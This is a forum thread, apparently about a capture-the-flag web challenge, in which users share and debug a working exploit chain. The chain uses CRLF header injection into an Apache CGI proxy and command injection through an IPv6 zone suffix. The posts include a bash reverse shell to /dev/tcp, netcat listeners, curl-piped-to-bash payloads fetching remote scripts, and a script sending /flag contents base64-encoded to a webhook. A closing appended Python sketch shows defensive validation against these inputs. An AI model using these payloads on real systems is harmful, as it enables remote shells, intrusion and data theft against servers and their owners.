Posts: 18
Threads: 0
Joined: Oct 2023
(03-23-2025, 03:09 PM)oyfyic Wrote: (03-23-2025, 02:24 PM)0xhdfg Wrote: (03-23-2025, 12:47 PM)0x02b375 Wrote: (03-23-2025, 11:47 AM)oyfyic Wrote: (03-23-2025, 10:25 AM)x1rx Wrote: any hint for web - cyber attack ?
//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL
CyberAttack
nc -lvnp 9001
forwardport tcp 9001
index.html
#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1
python -m http.server
forwardport 8000
GET http://94.237.61.48:53693/cgi-bin/attack...target=::1%$(curl%2bX.X.X.X:8000|bash)%26name=%0d%0a%0d%0a HTTP/1.1
replace X.X.X.X:8000 with the url that has your hosted file "index.html" that is just a bash revshell that will connect on the 9001 listener
(03-23-2025, 12:43 PM)oyfyic Wrote: (03-23-2025, 12:16 PM)x1rx Wrote: curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'
Shows the output:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
However nothing on the nc listener. Is there sth I am missing here
what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your server
#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`
So the final payload will look like:
curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'
And as the content of the webhook you can put:
Content-Type text/html
Content:
#!/bin/bash
curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`
I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
props you entering http://yourIP, whereas you only need to provide your IP, nothing else
Posts: 14
Threads: 0
Joined: Feb 2025
(03-23-2025, 03:17 PM)randomregister Wrote:
props you entering http://yourIP, whereas you only need to provide your IP, nothing else
What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this
Posts: 2
Threads: 0
Joined: Feb 2024
Can someone explain the payload ??
And why is "-" working on target ? Because the regex should block the dash ...
Posts: 13
Threads: 0
Joined: Nov 2024
(03-23-2025, 03:09 PM)oyfyic Wrote:
I have set up the webhook exactly as you have said. Appreciate all the help btw. The issue I have now is with the curl command which outputs:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?
Posts: 4
Threads: 0
Joined: Mar 2025
(03-23-2025, 07:14 PM)0xhdfg Wrote:
The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?
Same thing here. I tried everything posted in this thread too.
Posts: 18
Threads: 0
Joined: Oct 2023
(03-23-2025, 03:25 PM)oyfyic Wrote:
What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this
try it on your localhost, it will most likely work
Posts: 3
Threads: 0
Joined: Feb 2025
03-24-2025, 01:13 AM
I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.
Posts: 14
Threads: 0
Joined: Feb 2025
(03-24-2025, 01:13 AM)htdgthdsfx Wrote: I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.
Yeah. Can't seem to get past the filters. Someone who has solved this challenge kindly tell us what you did because it just ain't working out for us
Posts: 14
Threads: 0
Joined: Feb 2025
(03-24-2025, 11:10 AM)0x02b375 Wrote: on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect
I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>
Still not working. Kindly assist
Posts: 3
Threads: 0
Joined: Aug 2024
(03-24-2025, 01:12 PM)oyfyic Wrote:
Still not working. Kindly assist
While working on this challenge, I had some issues with the '/'. Even tho I encoded it 2 times, it was kinda still not working. So instead I used a solve like this:
curl+xx.xx.xx.xx?a=$(ls)
Just avoid doing any kind of '/'. Here's the solve:
curl+xx.xx.xx.xx?a=$(cd .. && cd .. && cd .. && cat flag*)
Also remember to double encode this.
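Added example, not part of the thread and not the challenge's own code: a defensive sketch of how a handler taking the `target` and `name` parameters seen above could refuse the two input shapes discussed here (an IPv6 literal with a `%` suffix, and CR/LF inside a value echoed into a redirect). It assumes, hypothetically, that `target` ends up as an argument to a `ping` command and that user text is placed in a `Location` header; all function names are made up for illustration.

```python
import ipaddress
from urllib.parse import quote


def validate_target(raw: str) -> str:
    """Return the canonical form of an IP literal, or raise ValueError."""
    # Python 3.9+ parses '::1%<zone>' and puts almost no limits on the
    # zone text, so a '%' suffix is refused up front, not trusted later.
    if "%" in raw:
        raise ValueError("IPv6 zone identifiers are not accepted")
    # Use the parsed, re-serialised address downstream, never the raw string.
    return str(ipaddress.ip_address(raw))


def ping_argv(raw_target: str) -> list:
    """Build an argument vector for subprocess.run(argv): no shell is
    involved, so '$( )', '|' and '&' are never interpreted."""
    return ["ping", "-c", "1", validate_target(raw_target)]


def redirect_location(message: str) -> str:
    """Build a Location value that cannot carry extra header lines."""
    # CR, LF and other control bytes end the header line early and let the
    # client append headers of its own, so they are rejected outright.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in message):
        raise ValueError("control character in header value")
    # Percent-encode everything else before it goes into the URL.
    return "../?result=" + quote(message, safe="")


if __name__ == "__main__":
    # Constructed sample inputs, shaped like the values in the thread.
    samples = ["127.0.0.1", "::1", "::1%$(id)", "-"]
    for value in samples:
        try:
            print(value, "->", ping_argv(value))
        except ValueError as exc:
            print(value, "-> rejected:", exc)
    try:
        redirect_location("a\r\nLocation: /a")
    except ValueError as exc:
        print("header value rejected:", exc)
```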